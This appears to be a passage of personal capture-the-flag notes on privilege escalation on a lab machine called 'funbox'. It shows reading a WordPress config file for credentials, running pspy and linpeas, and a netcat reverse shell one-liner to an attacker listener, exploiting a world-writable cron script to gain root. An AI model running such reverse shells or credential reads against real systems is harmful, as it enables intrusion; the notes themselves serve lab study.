Priv Esc

tar -xf html.tar

cat var/www/html/wp-config.php

Upload pspy

./pspy64

www-data@funbox:/home/funny$ ls -la
ls -la
total 47592
drwxr-xr-x 3 funny funny     4096 Aug 21  2020 .
drwxr-xr-x 4 root  root      4096 Jun 19  2020 ..
-rwxrwxrwx 1 funny funny       55 Aug 21  2020 .backup.sh
lrwxrwxrwx 1 funny funny        9 Aug 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19  2020 .cache
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19  2020 .reminder.sh
-rw-rw-r-- 1 funny funny 48701440 Aug  8 01:26 html.tar

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.214 1338 >/tmp/f

Run linpeas again

lxd/lxc Group - Privilege escalation - HackTricksbook.hacktricks.xyz

Followed to a tea minus the build-lxd command should be build-lxc

Weird route

Literally lost my shell so reran nc on port 1338 because the backup was running as a cron job as supposedly funny. Came back as root lol.

Turns out root was running the same cron job for /home/funny/.backup.sh

Didnt realize this earlier but makes more sense now with pspy results

I just got lucky :D

PreviousFoothold NextCredentials / Notes

Last updated 1 year ago